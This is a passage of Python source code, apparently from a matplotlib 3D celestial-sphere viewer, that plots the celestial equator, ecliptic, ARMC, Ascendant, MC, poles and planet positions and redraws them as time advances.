alpha_main_2=0.8\r\n self.alpha_main_2=alpha_main_2\r\n \r\n #===== Celestial Equator\r\n \r\n self.geo_latitude = geo_latitude\r\n self.geo_lat = np.radians(self.geo_latitude)\r\n geo_lat = self.geo_lat\r\n\r\n rotation = np.pi/2 + geo_lat\r\n self.rotation=rotation\r\n self.eq_rot_ang=rotation\r\n\r\n v_rot = self.Rodrigues_rotation(v,k,rotation)\r\n self.equator_rot=v_rot\r\n\r\n x,y,z=self.equator_rot\r\n x2= np.sin(φ) + x * np.cos(φ)\r\n y2= y * np.cos(φ)\r\n z2= z * np.cos(φ)\r\n '''\r\n #==== solid\r\n id_,=self.ax.plot(x2,y2,z2 ,color=\"#700000\", linestyle = \"solid\" ,picker=2) #'dashed'\r\n #id_=id(id_)\r\n self.ids[id(id_)] =[[x2[18],y2[18],z2[18]],\"Celestial Equator\"] #\"v_rot+π/2\"\r\n self.eq_circl=id_\r\n '''\r\n color_equat=\"#700000\"\r\n id_1=id_2=0 \r\n\r\n φ_1 = np.linspace(0, np.pi, data_pts)\r\n x2, y2, z2 = self.circl_vect(self.equator_rot,k,φ_1)\r\n eq_1 = [x2[0],y2[0],z2[0]]\r\n self.eq_circl_1, = self.ax.plot(x2, y2, z2, color=color_equat, picker=main_circles_picker, linewidth=1, linestyle = \"solid\", alpha=self.alpha_main_2)\r\n\r\n φ_2 = np.linspace(np.pi,2*np.pi, data_pts)\r\n x2b, y2b, z2b = self.circl_vect(self.equator_rot,k,φ_2)\r\n eq_2 = [x2b[0],y2b[0],z2b[0]]\r\n self.eq_circl_2, = self.ax.plot(x2b, y2b, z2b, color=color_equat, picker=main_circles_picker, linewidth=1, linestyle = \"dashed\", alpha=self.alpha_main_2)\r\n\r\n\r\n self.ids[id(self.eq_circl_1)] =[[x2[13],y2[13],z2[13]],\"Celestial Equator\"]\r\n self.ids[id(self.eq_circl_2)] =[self.ids[id(self.eq_circl_1)][0],\"Celestial Equator\"] \r\n\r\n self.equat_ids.append(self.eq_circl_1); self.equat_ids.append(self.eq_circl_2)\r\n\r\n #====== ARMC\r\n ARMC_= eq_1\r\n ARMC_= np.multiply(1.05,ARMC_)\r\n self.armc_id, = self.ax.plot(*ARMC_,c=\"#555555\",marker=\"$ARMC$\",markersize=12,picker=4) #point\r\n self.equat_ids.append(self.armc_id)\r\n self.ids[id(self.armc_id)] =[eq_1,\"ARMC\"]\r\n self.armc_id.set_visible(False)\r\n ARMC=np.radians(ARMC)\r\n self.v_equinox_ang=ARMC\r\n\r\n #------- 2nd point on rotated circle oblique\r\n self.v_equinox_ang=ARMC\r\n φ2=-ARMC\r\n x12, y12, z12 = self.circl_vect(self.equator_rot,k,φ2)\r\n self.v_equinox=[x12,y12,z12] # vernal equinox\r\n self.a_equinox=[-x12,-y12,-z12]\r\n self.equinox_id, = self.ax.plot(*self.v_equinox, c=\"#555\", marker=\"o\", markersize=2, zorder=3, alpha=1);\r\n self.ecl_ids.append(self.equinox_id)\r\n\r\n #====== poleN\r\n rot=self.rotation\r\n v_rot=self.equator_rot\r\n color_4=\"#444444\"\r\n rotation = self.eq_rot_ang + np.pi/2\r\n\r\n v_rot1 = self.Rodrigues_rotation(v,k,rotation)\r\n self.poleS=v_rot1\r\n v_rot2=-v_rot1\r\n self.poleN=v_rot2\r\n\r\n self.poleN_id, =self.ax.plot(*self.poleN,c=color_4,marker=\"$N$\",picker=5, zorder=2) #point\r\n self.ids[id(self.poleN_id)] =[self.poleN,\"North Pole\"] #\"v_rot-π/2\"\r\n self.equat_ids.append(self.poleN_id)\r\n\r\n self.poleS_id, =self.ax.plot(*self.poleS,c=color_4, marker=\"$S$\",picker=5, zorder=2) #point\r\n self.ids[id(self.poleS_id)] =[self.poleS,\"South Pole\"] #\"v_rot+π/2\"\r\n self.equat_ids.append(self.poleS_id)\r\n\r\n poleN_θ_hor=np.arccos(self.poleN[2])\r\n self.poleN_elev=np.degrees(poleN_θ_hor) \r\n \r\n\r\n #====== Ecliptic\r\n φ1 = -ARMC - np.pi/2\r\n x13, y13, z13 = self.circl_vect(self.equator_rot,k,φ1)\r\n self.v_rot4=[x13,y13,z13]\r\n\r\n #ε=23.43 \r\n k1=np.array(self.v_equinox) \r\n v1=np.array(self.v_rot4)\r\n ε=np.radians(self.ε)\r\n rotation = ε\r\n v_rot3 = self.Rodrigues_rotation(v1,k1,rotation)\r\n self.ecliptic_rot=v_rot3\r\n v2= -self.ecliptic_rot\r\n\r\n φ4=np.arctan(-k1[2]/v2[2])\r\n x3t= v2[0] * np.sin(φ4) + k1[0] * np.cos(φ4)\r\n if x3t<0:\r\n φ4 = φ4 + np.pi\r\n\r\n φ4=norm_r(φ4)\r\n self.asc_lon=φ4\r\n\r\n φ3 = np.arctan(-v2[0]/k1[0]) if k1[0] != 0 else np.pi/2\r\n\r\n if norm_r(ARMC)< np.pi:\r\n φ3=np.pi/2 - φ3\r\n ecl_st=0 + φ3 #ecl_start\r\n else:\r\n φ3= - np.pi/2 - φ3\r\n ecl_st=0 + φ3\r\n \r\n self.ecl_start=np.degrees(φ3)\r\n φ_1 = np.linspace(ecl_st , ecl_st + np.pi, data_pts)\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ_1)\r\n self.ecl_circl_1, = self.ax.plot(x3,y3,z3 ,color=color_ecl, picker=main_circles_picker, linestyle = \"solid\", alpha=alpha_main_2)\r\n self.ids[id(self.ecl_circl_1)] =[[x3[15],y3[15],z3[15]],\"Ecliptic\"]\r\n \r\n\r\n φ_2 = np.linspace(ecl_st + np.pi, ecl_st + 2*np.pi, data_pts)\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ_2)\r\n self.ecl_circl_2, = self.ax.plot(x3,y3,z3 ,color=color_ecl, picker=main_circles_picker, linestyle = \"dashed\", alpha=alpha_main_2)\r\n self.ids[id(self.ecl_circl_2)] =[self.ids[id(self.ecl_circl_1)][0],\"Ecliptic\"]\r\n \r\n r1=1.07\r\n x3p, y3p, z3p = self.circl_vect(k1, v2, φ3, r1)\r\n self.v_MC=self.circl_vect(k1, v2, φ3)\r\n\r\n self.mc_id,= self.ax.plot(x3p,y3p,z3p,c=\"#444444\",marker=\"$MC$\",markersize=10,picker=4, zorder=2); #point\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ3)\r\n lon_=f'Medium Coeli: lon={round(self.planets_data[\"MC\"][\"ecl\"][0],2)}°'\r\n self.ids[id(self.mc_id)] =[[x3, y3, z3],lon_]\r\n self.ecl_ids.append(self.mc_id)\r\n self.mc_id.set_visible(False)\r\n\r\n\r\n #====== Asc ========\r\n x13, y13, z13 = self.circl_vect(k1, v2, φ4)\r\n self.asc_id2, =self.ax.plot(x13,y13,z13, c=\"#333\", marker=\"o\", markersize=3, zorder=2, alpha=0.6);#point\r\n self.ecl_ids.append(self.asc_id2)\r\n asc=[x13,y13,z13]\r\n self.v_asc=asc\r\n\r\n r1=1.07\r\n x3p, y3p, z3p = self.circl_vect(k1, v2, φ4, r1)\r\n asc_t=[x3p,y3p,z3p-0.03]\r\n self.asc_id,=self.ax.plot(*asc_t, c=\"#555555\",marker=\"$Asc$\",markersize=10,picker=5, zorder=2) ;#point\r\n\r\n self.asc_id2.set_visible(False)\r\n self.asc_id.set_visible(False)\r\n self.ecl_ids.append(self.asc_id)\r\n\r\n\r\n self.Asc_φ_hor=np.arccos(self.v_asc[0])\r\n if self.v_asc[1]<0: self.Asc_φ_hor = -abs(self.Asc_φ_hor)\r\n self.Asc_φ_hor = norm_r(self.Asc_φ_hor)\r\n\r\n\r\n '''\r\n #=== solid\r\n x3= k1[0] * np.sin(φ) + self.ecliptic_rot[0] * np.cos(φ)\r\n y3= k1[1] * np.sin(φ) + self.ecliptic_rot[1] * np.cos(φ)\r\n z3= k1[2] * np.sin(φ) + self.ecliptic_rot[2] * np.cos(φ)\r\n id_,=self.ax.plot(x3,y3,z3 ,color = color_ecl, linestyle = \"solid\" ,picker=2) #'dashed'\r\n self.ids[id(id_)] =[[x2[18],y2[18],z2[18]],\"Ecliptic\"] \r\n self.ecl_circle=id_\r\n '''\r\n\r\n #============= Ecliptic pole \r\n\r\n rotation = -np.pi/2\r\n k1=np.array(self.v_equinox) \r\n v1=np.array(self.ecliptic_rot)\r\n\r\n v_rot6 = self.Rodrigues_rotation(v1,k1,rotation)\r\n self.poleN_ecl = v_rot6\r\n self.poleN_ecl_id, =self.ax.plot(*self.poleN_ecl,c=color_ecl, marker=\"$n$\",markersize=5,picker=5, zorder=2, alpha=0.8)\r\n self.poleS_ecl=-self.poleN_ecl; \r\n self.poleS_ecl_id, =self.ax.plot(*self.poleS_ecl,c=color_ecl, marker=\"$s$\",markersize=5,picker=5, zorder=2, alpha=0.8)\r\n\r\n self.ids[id(self.poleN_ecl_id)] =[self.poleN_ecl,\"Ecliptic North Pole\"]\r\n self.ecl_ids.append(self.poleN_ecl_id)\r\n self.ids[id(self.poleS_ecl_id)] =[self.poleS_ecl,\"Ecliptic South Pole\"]\r\n self.ecl_ids.append(self.poleS_ecl_id)\r\n\r\n\r\n poleN_ecl_θ_hor=np.arccos(self.poleN_ecl[2])\r\n pole_ecl_elev= np.pi/2 - poleN_ecl_θ_hor\r\n self.pole_ecl_elev=np.degrees(pole_ecl_elev)\r\n\r\n self.plot_ecliptic_scale()\r\n self.plot_equator_scale()\r\n\r\n\r\n def plot_Equator_Ecliptic_next(self):\r\n ARMC=self.planets_data[\"MC\"][\"eq\"][0]\r\n ARMC=float(ARMC)\r\n ARMC=norm_(ARMC)\r\n self.ARMC=ARMC\r\n \r\n φ = self.ψ\r\n self.k = k = np.array([1, 0, 0])\r\n self.v = v = np.array([0, 1, 0])\r\n geo_latitude=self.geo_latitude\r\n\r\n s1 = \"S\" if self.geo_latitude<0 else \"N\"\r\n s2 = \"W\" if self.geo_longitude<0 else \"E\"\r\n txt=\"ARMC={:.0f}°, lat={:.0f}°{}, lon={:.0f}°{}\".format(ARMC,self.geo_latitude,s1,self.geo_longitude,s2)\r\n self.id_text.set_text(txt)\r\n self.south = True if self.geo_latitude<0 else False\r\n \r\n #===== Celestial Equator\r\n \r\n self.geo_latitude = geo_latitude\r\n self.geo_lat = np.radians(self.geo_latitude)\r\n geo_lat = self.geo_lat\r\n\r\n rotation = np.pi/2 + geo_lat\r\n self.rotation=rotation\r\n self.eq_rot_ang=rotation\r\n\r\n v_rot = self.Rodrigues_rotation(v,k,rotation)\r\n self.equator_rot=v_rot\r\n\r\n x,y,z=self.equator_rot\r\n x2= np.sin(φ) + x * np.cos(φ)\r\n y2= y * np.cos(φ)\r\n z2= z * np.cos(φ)\r\n\r\n color_equat=\"#700000\"\r\n id_1=id_2=0 \r\n\r\n φ_1 = np.linspace(0, np.pi, 50)\r\n x2, y2, z2 = self.circl_vect(self.equator_rot,k,φ_1)\r\n eq_1 = [x2[0],y2[0],z2[0]]\r\n self.eq_circl_1.set_data_3d(x2, y2, z2)\r\n\r\n φ_2 = np.linspace(np.pi,2*np.pi, 50)\r\n x2b, y2b, z2b = self.circl_vect(self.equator_rot,k,φ_2)\r\n eq_2 = [x2b[0],y2b[0],z2b[0]]\r\n \r\n self.eq_circl_2.set_data_3d(x2b, y2b, z2b)\r\n\r\n #====== ARMC\r\n ARMC_= eq_1\r\n ARMC_= np.multiply(1.05,ARMC_)\r\n self.armc_id.set_data_3d(*ARMC_)\r\n ARMC=np.radians(ARMC)\r\n self.v_equinox_ang=ARMC\r\n\r\n self.v_equinox_ang=ARMC\r\n φ2=-ARMC\r\n x12, y12, z12 = self.circl_vect(self.equator_rot,k,φ2)\r\n self.v_equinox=[x12,y12,z12]\r\n self.a_equinox=[-x12,-y12,-z12]\r\n self.equinox_id.set_data_3d(x12, y12, z12)\r\n\r\n #====== poleN\r\n rot=self.rotation\r\n v_rot=self.equator_rot\r\n color_4=\"#444444\"\r\n\r\n rotation = self.eq_rot_ang + np.pi/2\r\n v_rot1 = self.Rodrigues_rotation(v,k,rotation)\r\n self.poleS=v_rot1\r\n v_rot2=-v_rot1\r\n self.poleN=v_rot2\r\n\r\n self.poleN_id.set_data_3d(*self.poleN)\r\n self.ids[id(self.poleN_id)] =[self.poleN,\"North Pole\"]\r\n\r\n self.poleS_id.set_data_3d(*self.poleS)\r\n self.ids[id(self.poleS_id)] =[self.poleS,\"South Pole\"]\r\n poleN_θ_hor=np.arccos(self.poleN[2])\r\n self.poleN_elev=np.degrees(poleN_θ_hor) \r\n\r\n #====== Ecliptic \r\n\r\n φ1 = -ARMC - np.pi/2\r\n x13, y13, z13 = self.circl_vect(self.equator_rot,k,φ1)\r\n self.v_rot4=[x13,y13,z13]\r\n \r\n k1=np.array(self.v_equinox) \r\n v1=np.array(self.v_rot4)\r\n ε=np.radians(self.ε)\r\n rotation = ε\r\n v_rot3 = self.Rodrigues_rotation(v1,k1,rotation)\r\n self.ecliptic_rot=v_rot3\r\n v2= -self.ecliptic_rot\r\n\r\n φ4=np.arctan(-k1[2]/v2[2])\r\n x3t= v2[0] * np.sin(φ4) + k1[0] * np.cos(φ4)\r\n if x3t<0:\r\n φ4 = φ4 + np.pi\r\n\r\n φ4=norm_r(φ4)\r\n self.asc_lon=φ4\r\n\r\n φ3 = np.arctan(-v2[0]/k1[0]) if k1[0] != 0 else np.pi/2\r\n\r\n if norm_r(ARMC)< np.pi:\r\n φ3=np.pi/2 - φ3\r\n ecl_st=0 + φ3 #ecl_start\r\n else:\r\n φ3= - np.pi/2 - φ3\r\n ecl_st=0 + φ3\r\n\r\n self.ecl_start=np.degrees(φ3)\r\n φ_1 = np.linspace(ecl_st , ecl_st + np.pi, 50)\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ_1)\r\n self.ecl_circl_1.set_data_3d(x3, y3, z3)\r\n φ_2 = np.linspace(ecl_st + np.pi, ecl_st + 2*np.pi, 50)\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ_2)\r\n self.ecl_circl_2.set_data_3d(x3, y3, z3)\r\n\r\n\r\n #====== MC ========\r\n r1=1.07\r\n\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ3, r1)\r\n self.v_MC=self.circl_vect(k1, v2, φ3)\r\n self.mc_id.set_data_3d(x3, y3, z3)\r\n\r\n x3, y3, z3 = self.circl_vect(k1, v2, φ3)\r\n lon_=f'Medium Coeli: lon={round(self.planets_data[\"MC\"][\"ecl\"][0],2)}°'\r\n self.ids[id(self.mc_id)] =[[x3, y3, z3],lon_]\r\n\r\n #====== Asc ========\r\n r1=1.07\r\n\r\n x3p, y3p, z3p = self.circl_vect(k1, v2, φ4, r1)\r\n asc_t=[x3p,y3p,z3p-0.03]\r\n self.asc_id.set_data_3d(*asc_t)\r\n\r\n\r\n x13, y13, z13 = self.circl_vect(k1, v2, φ4)\r\n asc=[x13,y13,z13]\r\n self.v_asc=asc\r\n self.asc_id2.set_data_3d(x13, y13, z13)\r\n\r\n self.Asc_φ_hor=np.arccos(self.v_asc[0])\r\n if self.v_asc[1]<0: self.Asc_φ_hor = -abs(self.Asc_φ_hor)\r\n self.Asc_φ_hor = norm_r(self.Asc_φ_hor)\r\n \r\n #============= Ecliptic pole \r\n rotation = -np.pi/2\r\n k1=np.array(self.v_equinox) \r\n v1=np.array(self.ecliptic_rot)\r\n v_rot6 = self.Rodrigues_rotation(v1,k1,rotation)\r\n self.poleN_ecl = v_rot6\r\n self.poleS_ecl=-self.poleN_ecl; \r\n self.poleN_ecl_id.set_data_3d(*self.poleN_ecl)\r\n self.poleS_ecl_id.set_data_3d(*self.poleS_ecl)\r\n\r\n poleN_ecl_θ_hor=np.arccos(self.poleN_ecl[2])\r\n pole_ecl_elev= np.pi/2 - poleN_ecl_θ_hor\r\n self.pole_ecl_elev=np.degrees(pole_ecl_elev)\r\n\r\n self.ids[id(self.poleN_ecl_id)] =[self.poleN_ecl,\"Ecliptic North Pole\"]\r\n self.ids[id(self.poleS_ecl_id)] =[self.poleS_ecl,\"Ecliptic South Pole\"]\r\n \r\n self.plot_ecliptic_scale()\r\n self.plot_equator_scale()\r\n\r\n\r\n def plot_meridian(self): \r\n color_=\"#666666\" \r\n alpha_main=self.alpha_main\r\n θ=self.ψ\r\n y2=np.sin(θ)\r\n z2=np.cos(θ)\r\n x2=np.zeros(np.size(y2))\r\n id_,=self.ax.plot(x2,y2,z2 ,color=color_, linestyle = (0, (1, 2,1,3)), alpha=alpha_main, picker=main_circles_picker, zorder=0)\r\n self.ids[id(id_)] =[[x2[6],y2[6],z2[6]],\"Meridian\"]\r\n self.mer_circle=id_\r\n\r\n def plot_next_prev(self, seconds=0, minutes=0, hours=0):\r\n self.clear_ann()\r\n self.id_text_2.set_text(\"\")\r\n tz_=self.data[\"tz\"]\r\n t_obj=add_days(self.timestamp, seconds=seconds, minutes=minutes, hours=hours,tz_=tz_)\r\n date_t= t_obj[\"date_utc\"]; time_t= t_obj[\"time_utc\"]\r\n date_t_loc= t_obj[\"date_loc\"]; time_t_loc= t_obj[\"time_loc\"] \r\n self.timestamp=t_obj[\"timestamp\"]\r\n\r\n self.date_utc = date_t\r\n self.time_utc = time_t\r\n\r\n latitude = float(self.data[\"lat\"])\r\n longitude = float(self.data[\"lon\"])\r\n self.geo_latitude=latitude\r\n self.planets_data = calc_.get_planets_data(self.date_utc, self.time_utc, latitude, longitude)\r\n\r\n self.plot_Equator_Ecliptic_next()\r\n self.plot_zodiac_next()\r\n self.plot_planets_next(self.planets_data)\r\n\r\n time_utc = \" UTC: {}, {} \".format(self.date_utc, self.time_utc)\r\n time_loc = \"{: >10}, {: >8}\".format(date_t_loc, time_t_loc)\r\n time_loc= \"{: ^21}\".format(time_loc)\r\n\r\n self.id_text_time.set_text(time_loc)\r\n self.id_text_time2.set_text(time_utc)\r\n\r\n self.legend_updt()\r\n\r\n\r\n def plot_planets(self, planets_data):\r\n for i, pl in enumerate(planets_data):\r\n if pl not in c.planets.keys():continue\r\n pl_RA=planets_data[pl]['eq'][0]\r\n pl_decl=planets_data[pl]['eq'][1]\r\n lon=planets_data[pl]['ecl'][0]\r\n lat=planets_data[pl]['ecl'][1]\r\n sym = \"$\" + c.planets[pl] + \"$\"\r\n txt=\"{}: RA={:.2f}°, decl={:.2f}°, lon={:.1f}°, lat={:.1f}°\".format(pl, pl_RA, pl_decl, lon, lat)\r\n self.plot_planet_equat(pl_RA ,pl_decl, lon, lat ,rad=False,meridian=False, name=pl,sym=sym, text=txt)\r\n\r\n def plot_planet_equat(self, RA, decl, lon, lat, rad=False, meridian=False, parallel=False, name=\"\",sym =\"\",text=\"\"):\r\n pl_RA=np.radians(RA) if rad==False else RA\r\n pl_decl=np.radians(decl) if rad==False else decl\r\n rotation=pl_RA\r\n φ=self.ψ\r\n θ=self.ψ\r\n k=self.k\r\n k2 = self.poleN;\r\n v2 = self.equator_rot; \r\n \r\n color_pl2=pl_colors[name]\r\n color_pl1=pl_colors[name]\r\n color_dot=\"#1C0367\"\r\n color_dot=color_pl1\r\n\r\n rotation=rotation - self.v_equinox_ang\r\n v_rot5 = self.Rodrigues_rotation(v2,k2,rotation)\r\n\r\n v_mer = self.circl_vect(v_rot5,k2,φ)\r\n style_=(0, (1,4,1,6)) \r\n color_oran=\"#F38600\"\r\n color_yel=\"#FFCD00\"\r\n color_mer_par=color_pl1\r\n style_= (0, (1,3,)) if name in [\"Sun\",\"Moon\",\"Jupiter\"] else style_\r\n alpha_= 0.8 if name in [\"Sun\",\"Moon\",\"Jupiter\"] else 0.6 #fix light color contrast\r\n id_Mer, = self.ax.plot(*v_mer ,color=color_mer_par, linestyle=style_, linewidth=1,alpha=alpha_, picker=2)\r\n if meridian==False:\r\n id_Mer.set_visible(False)\r\n\r\n id_Mer_nat, = self.ax.plot(*v_mer ,color=color_mer_par, linestyle=(0, (2,4,3,4)), linewidth=1,alpha=alpha_, picker=2)\r\n id_Mer_nat.set_visible(False)\r\n \r\n shift=np.sin(pl_decl)\r\n data=self.plot_parallel(shift,color_=color_mer_par, style_=style_, alpha=alpha_) \r\n id_Par=data[0]\r\n if parallel==False:\r\n id_Par.set_visible(False)\r\n\r\n φ2 = pl_RA - self.v_equinox_ang\r\n φ2=norm_r(φ2)\r\n pl_φ_eq=φ2\r\n v_RA = self.circl_vect(self.equator_rot,k,φ2)\r\n\r\n id_pt_Eq, = self.ax.plot(*v_RA, c=color_dot, marker=\"o\", markersize=2, picker=4, zorder=3)\r\n id_pt_Eq.set_visible(False)\r\n\r\n pl_declination=pl_decl\r\n θ2=pl_decl\r\n v_pl = self.circl_vect(v_RA,k2,θ2)\r\n pl_θ_hor=np.arccos(v_pl[2])\r\n\r\n #-- planet dot \r\n if \"Node\" in name:\r\n id_pl, =self.ax.plot(*v_pl, c=color_pl1, marker=\"o\", picker=5, markersize=2,zorder=6) #onpick\r\n else:\r\n id_pl, =self.ax.plot(*v_pl, c=color_pl1, marker=\"o\", picker=5, markersize=4,zorder=6) #onpick\r\n\r\n arr=[-0.05,0.05]\r\n shift=0.07\r\n v_pl_t=np.add(v_pl,shift)\r\n\r\n if \"Node\" in name:\r\n id_t =self.ax.text(*v_pl_t,s=sym,fontsize=11,c=color_pl2, label=name, fontweight=800, picker=5,bbox=dict(boxstyle=\"round\",edgecolor=(\"#FFF\"),facecolor=(\"#FFF\"),pad=0.0, alpha=0.0), alpha=1.0, zorder=2)\r\n elif name in [\"Sun\",\"Moon\"]:\r\n id_t =self.ax.text(*v_pl_t,s=sym,fontsize=17,c=color_pl2, label=name, fontweight=800, picker=5,bbox=dict(boxstyle=\"round\",edgecolor=(\"#FFF\"),facecolor=(\"#FFF\"),pad=0.0, alpha=0.0), alpha=1.0, zorder=4)\r\n else:\r\n id_t =self.ax.text(*v_pl_t,s=sym,fontsize=16,c=color_pl2, label=name, fontweight=800, picker=5,bbox=dict(boxstyle=\"round\",edgecolor=(\"#FFF\"),facecolor=(\"#FFF\"),pad=0.0, alpha=0.0), alpha=1.0, zorder=4)\r\n\r\n v_hor=[v_pl[0],v_pl[1],0]\r\n v_hor=v_hor/np.linalg.norm(v_hor) \r\n id_pt_Hor, = self.ax.plot(*v_hor,c=color_dot,marker=\"o\", markersize=2, picker=4, zorder=7) \r\n id_pt_Hor.set_visible(False)\r\n\r\n pl_φ_hor = np.arccos(v_hor[0]); \r\n if v_hor[1] < 0:\r\n pl_φ_hor = 2*np.pi - pl_φ_hor\r\n\r\n azimuth = 2*np.pi - pl_φ_hor + np.pi/2\r\n azimuth = norm_r(azimuth)\r\n\r\n pl_θ_hor= np.arccos(v_pl[2])\r\n pl_alt_hor= np.pi/2 - pl_θ_hor\r\n #pl_alt_hor = rd(pl_alt_hor)\r\n\r\n #------ planet's proportionate horizon\r\n #tan(a)/tan(A)=sin(b) # Napier\r\n #np.tan(np.pi/2 - θ_pl)/np.tan(α)=np.sin(np.pi/2 - φ_pl) -> α= np.arctan(np.tan(np.pi/2 - θ_pl)/np.sin(np.pi/2 - φ_pl))\r\n #np.tan(np.pi/2 - θ_proj_hor)/np.tan(α)=np.sin(np.pi/2)\r\n #np.tan(np.pi/2 - θ_proj_hor)=np.tan(α) -> np.pi/2 - θ_proj_hor =α -> θ_proj_hor =np.pi/2 - α\r\n\r\n α = np.arctan(np.tan(np.pi/2 - pl_θ_hor)/np.sin(np.pi/2 - pl_φ_hor)) # α = proportionate horizon's inclination\r\n k=self.k\r\n w=self.w\r\n if v_pl[0]<0: α = α + np.pi\r\n v_rot8 = self.Rodrigues_rotation(k, w, α) \r\n φ2 = self.ψ2\r\n x2,y2,z2 = self.circl_vect(v_rot8, w, φ2)\r\n id_proj_hor,=self.ax.plot(x2,y2,z2 ,color=color_mer_par, linestyle = style_, linewidth=1, alpha=alpha_, picker=1, zorder=1)\r\n id_proj_hor.set_visible(False)\r\n\r\n id_proj_hor_nat,=self.ax.plot(x2,y2,z2 ,color=color_mer_par, linestyle = (0, (2,4,3,4)), linewidth=1, alpha=alpha_, picker=1, zorder=1)\r\n id_proj_hor_nat.set_visible(False)\r\n \r\n k2=np.array(self.v_equinox) \r\n v2= -self.ecliptic_rot \r\n φ2=np.radians(lon) \r\n v_ecl = self.circl_vect(k2,v2,φ2)\r\n id_pt_Ecl, = self.ax.plot(*v_ecl,c=color_dot,marker=\"o\", markersize=2, picker=4, zorder=5);\r\n id_pt_Ecl.set_visible(False)\r\n pl_φ_ecl=lon\r\n\r\n #----- help_lines\r\n color_lin=\"#0D5022\"\r\n\r\n ve_=self.line_vect(v_RA, v_pl)\r\n id_l_eq,=self.ax.plot(*ve_ ,color=color_lin, linestyle = (0, (1,2,1,3)), lw=1, alpha=0.6, picker=1)\r\n id_l_eq.set_visible(False)\r\n \r\n ve_=self.line_vect(v_hor, v_pl)\r\n id_l_ho,=self.ax.plot(*ve_ ,color=color_lin, linestyle = (0, (1,2,1,3)), lw=1, alpha=0.6, picker=1)\r\n id_l_ho.set_visible(False)\r\n\r\n ve_=self.line_vect(v_ecl, v_pl)\r\n id_l_ecl,=self.ax.plot(*ve_ ,color=color_lin, linestyle = (0, (1,2,1,3)), lw=1, alpha=0.6, picker=1)\r\n id_l_ecl.set_visible(False)\r\n\r\n self.planets_obj[id_t]={} \r\n self.planets_obj[id_t][\"id_pl\"]=id_pl\r\n self.planets_obj[id_t][\"id_Mer\"]=id_Mer \r\n self.planets_obj[id_t][\"id_Mer_nat\"]=id_Mer_nat\r\n self.planets_obj[id_t][\"id_Par\"]=id_Par \r\n self.planets_obj[id_t][\"id_proj_hor\"]=id_proj_hor \r\n self.planets_obj[id_t][\"id_proj_hor_nat\"]=id_proj_hor_nat \r\n self.planets_obj[id_t][\"name\"]=name\r\n self.planets_obj[id_t][\"txt\"]=text\r\n\r\n self.planets_obj[id_t][\"id_pt_Eq\"] = (id_pt_Eq, rd(norm_r(pl_φ_eq + self.v_equinox_ang)), v_RA, rd(pl_φ_eq)) \r\n self.planets_obj[id_t][\"id_pt_Hor\"] = (id_pt_Hor, rd(pl_φ_hor), v_hor, rd(azimuth), rd(pl_alt_hor))\r\n self.planets_obj[id_t][\"id_pt_Ecl\"] = (id_pt_Ecl, round(pl_φ_ecl,1), v_ecl)\r\n\r\n self.planets_obj[id_t][\"id_l_eq\"]=id_l_eq\r\n self.planets_obj[id_t][\"id_l_ho\"]=id_l_ho\r\n self.planets_obj[id_t][\"id_l_ecl\"]=id_l_ecl\r\n\r\n self.planets_obj[id_t][\"show_mer_par\"]=0\r\n\r\n \r\n self.planets_ids[name]={}\r\n self.planets_ids[name][\"id_pl\"]=id_pl\r\n self.planets_ids[name][\"id_t\"]=id_t\r\n self.planets_ids[name][\"id_Mer\"]=id_Mer\r\n self.planets_ids[name][\"id_Mer_nat\"]=id_Mer_nat\r\n self.planets_ids[name][\"id_Par\"]=id_Par\r\n self.planets_ids[name][\"id_proj_hor\"]=id_proj_hor \r\n self.planets_ids[name][\"id_proj_hor_nat\"]=id_proj_hor_nat\r\n self.planets_ids[name][\"id_pt_Eq\"]=id_pt_Eq\r\n self.planets_ids[name][\"id_pt_Hor\"]=id_pt_Hor\r\n self.planets_ids[name][\"id_pt_Ecl\"]=id_pt_Ecl\r\n self.planets_ids[name][\"id_l_eq\"]=id_l_eq\r\n self.planets_ids[name][\"id_l_ho\"]=id_l_ho\r\n self.planets_ids[name][\"id_l_ecl\"]=id_l_ecl\r\n\r\n\r\n def plot_planets_next(self, planets_data):\r\n for i, pl in enumerate(planets_data):\r\n if pl not in c.planets.keys():continue\r\n pl_RA=planets_data[pl]['eq'][0]\r\n pl_decl=planets_data[pl]['eq'][1]\r\n lon=planets_data[pl]['ecl'][0]\r\n lat=planets_data[pl]['ecl'][1]\r\n txt=\"{}: RA={:.2f}°, decl={:.2f}°, lon={:.1f}°, lat={:.1f}°\".format(pl, pl_RA, pl_decl, lon, lat)\r\n self.plot_planet_equat_next(pl_RA ,pl_decl, lon, lat ,rad=False,meridian=False, name=pl, text=txt) \r\n\r\n def plot_planet_equat_next(self, RA, decl, lon, lat, rad=False, meridian=False, parallel=False, name=\"\", text=\"\"):\r\n pl_RA=np.radians(RA) if rad==False else RA\r\n pl_decl=np.radians(decl) if rad==False else decl\r\n rotation=pl_RA\r\n φ=self.ψ\r\n θ=self.ψ\r\n k=self.k\r\n j=np.array([0,0,1])\r\n k2 = self.poleN;\r\n v2 = self.equator_rot; \r\n\r\n color_pl2=pl_colors[name]\r\n color_pl1=pl_colors[name]\r\n\r\n rotation=rotation - self.v_equinox_ang\r\n v_rot5 = self.Rodrigues_rotation(v2,k2,rotation)\r\n \r\n v_mer = self.circl_vect(v_rot5,k2,φ)\r\n style_=\"dashed\"\r\n color_=\"#543E17\" \r\n self.planets_ids[name][\"id_Mer\"].set_data_3d(*v_mer)\r\n\r\n shift=np.sin(pl_decl)\r\n data=self.plot_parallel(shift, redraw=False) \r\n id_Par=data[0]\r\n v_par=data[1]\r\n self.planets_ids[name][\"id_Par\"].set_data_3d(*v_par) \r\n\r\n φ2 = pl_RA - self.v_equinox_ang\r\n φ2=norm_r(φ2)\r\n pl_φ_eq=φ2\r\n\r\n v_RA = self.circl_vect(self.equator_rot,k,φ2)\r\n\r\n self.planets_ids[name][\"id_pt_Eq\"].set_data_3d(*v_RA)\r\n \r\n pl_declination=pl_decl\r\n θ2=pl_decl\r\n v_pl = self.circl_vect(v_RA,k2,θ2)\r\n\r\n pl_θ_hor=np.arccos(v_pl[2])\r\n\r\n self.planets_ids[name][\"id_pl\"].set_data_3d(*v_pl) \r\n arr=[-0.05,0.05]\r\n shift=0.07\r\n v_vert=np.cross(v_pl,j)\r\n v_vert=v_vert/np.linalg.norm(v_vert)\r\n v_pl_t=np.add(v_pl,shift)\r\n\r\n self.planets_ids[name][\"id_t\"].set_position_3d(v_pl_t);\r\n\r\n\r\n 